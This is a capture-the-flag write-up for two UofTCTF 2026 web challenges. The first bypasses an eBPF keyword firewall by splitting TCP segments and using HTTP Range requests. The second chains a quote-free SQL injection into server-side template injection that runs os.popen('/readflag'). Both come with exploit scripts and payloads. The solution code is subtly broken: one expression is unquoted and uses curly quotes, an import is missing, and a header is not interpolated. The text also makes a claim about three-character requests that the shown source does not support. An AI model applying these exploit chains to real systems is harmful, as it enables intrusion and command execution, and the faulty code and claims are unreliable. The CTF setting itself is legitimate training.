UofTCTF 2026

Firewall

Total Solver: 503/1736

uoftctf{f1rew4l1_Is_nOT_par7icu11rLy_R0bust_I_bl4m3_3bpf}

Overview Challenge / Idea

The objective of this challenge is to access and read the /flag.html file hosted on an Nginx server. However, the server is protected by an advanced firewall that leverages eBPF (Extended Berkeley Packet Filter) technology.

This firewall inspects all network traffic—both ingress and egress—and blocks any packet containing the keyword "flag" or the "%" symbol. Participants must devise a method to bypass these restrictions to successfully retrieve the contents of the file.

Source Code Analysis

//firewall.c
<snippet>
#define KW_LEN 4
static const char blocked_kw[KW_LEN] = "flag";
static const char blocked_char = '%';
<snippet>
        // Filter traffic
        if (has_blocked_kw(skb, ETH_HLEN + ip_hdr_size, ip_tot_len - ip_hdr_size)) {
            return TC_ACT_SHOT;
        }
        if (has_blocked_char(skb, ETH_HLEN + ip_hdr_size, ip_tot_len - ip_hdr_size)) {
            return TC_ACT_SHOT;
        }

From this setup, it is clear that requests are limited to a maximum of three characters. Any request containing the keyword "flag" will be dropped by the firewall. Furthermore, attempts to bypass the restriction using encoding are also blocked, since encoded strings inherently include the "%" symbol, which is filtered as well

Solution

Step 1: Bypassing the Request Filter
The firewall blocks any packet containing the keyword "flag" or the "%" symbol. To avoid detection:
- Split the request into smaller parts so that the forbidden keyword never appears in a single packet.
- Example:
--  GET /f
--  lag.html
Since neither packet contains the blocked keyword, the firewall allows them through. 
When Nginx reassembles the packets, it correctly interprets the request as GET /flag.html.

Step 2: Handling the Response
The firewall also inspects outgoing traffic. If the response contains the word “flag”, it will be blocked. To bypass this:
- Force the server to send the response in small chunks, ensuring that the forbidden keyword does not appear in a single packet.
- This can be achieved using the HTTP Range header, which allows requesting specific byte ranges of the file.
By retrieving the file in byte-sized chunks, the response avoids containing the blocked keyword in any single packet, allowing the participant to reconstruct the full contents of /flag.html.

//sol.py
#!/usr/bin/env python3
from pwn import *
import time

HOST = "IP"
PORT = 5000

def http_range(start, end):
    conn = remote(HOST, PORT)
    conn.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

    ## Send split request to bypass filter
    conn.send(b"GET /fl")
    time.sleep(0.5)
    req = (
        b"ag.html HTTP/1.1\r\n"
        b"Host: {HOST}\r\n"
        b"Range: bytes=%d-%d\r\n"
        b"\r\n" % (start, end)
    )
    conn.send(req)

    # Receive response
    data = conn.recvall(timeout=2)
    conn.close()
    return data

print(http_range(0, 130).decode(errors="ignore"))
print(http_range(130, 260).decode(errors="ignore"))

No-Quotes

uoftctf{w0w_y0u_5UcC355FU1Ly_Esc4p3d_7h3_57R1nG!}

Overview/Idea

The login mechanism is flawed: the source code reveals that SQL queries are constructed in an unsafe manner, leaving the application vulnerable to SQL Injection.

After successfully bypassing authentication, the application continues to expose insecure functionality through its template rendering engine. Improper handling of template functions introduces a Server-Side Template Injection (SSTI) vulnerability, which can be leveraged to execute arbitrary commands on the server.

Source Code Analysis

//app.py
def waf(value: str) -> bool:
    blacklist = ["'", '"']
    return any(char in value for char in blacklist)
    
#### @app.post("/login")
    query = (
        "SELECT id, username FROM users "
        f"WHERE username = ('{username}') AND password = ('{password}')"
    )
    <snippet>
    @app.get("/home")
def home():
    if not session.get("user"):
        return redirect(url_for("index"))
    return render_template_string(open("templates/home.html").read() % session["user"])

The WAF in this challenge only filters single(') and double quotes("), which can be bypassed using hex encoding, and since the SQL input is directly inserted into the query, authentication can be bypassed with a backslash escape (\) and a crafted UNION SELECT payload.

After login, insecure template rendering allows classic SSTI injection because the dot(.) operator is not blocked, so a payload such as {{ config.__class__.__init__.__globals__.os.popen('/readflag').read() }} can be used, encoded into hex to avoid quote restrictions.

//SSTI Payload
ssti_exp={{ config.__class__.__init__.__globals__.os.popen(‘/readflag’).read() }}
ssti_hex=ssti_exp.encode().hex()

// SQL Injection
username = \\
password = ') UNION SELECT 1, 0x{ssti_hex}-- #'

Solution

#!/usr/bin/env python3
import requests

BASE_URL = "https://localhost:5000"
def solve():
    url = f"{BASE_URL}/login"
    s = requests.Session()

    ssti_exp={{ config.__class__.__init__.__globals__.os.popen(‘/readflag’).read() }}
    ssti_hex=ssti_exp.encode().hex()
    
    username = '\\'
    password = f") UNION SELECT 1, 0x{ssti_hex}-- -"

    r = s.post(url, data={"username": username, "password": password})

    match = re.search(r'uoftctf\{.*?\}', r.text)
    if match:
        print(match.group(0))
    else:
        print("Flag not found in response")

if __name__ == "__main__":
    solve()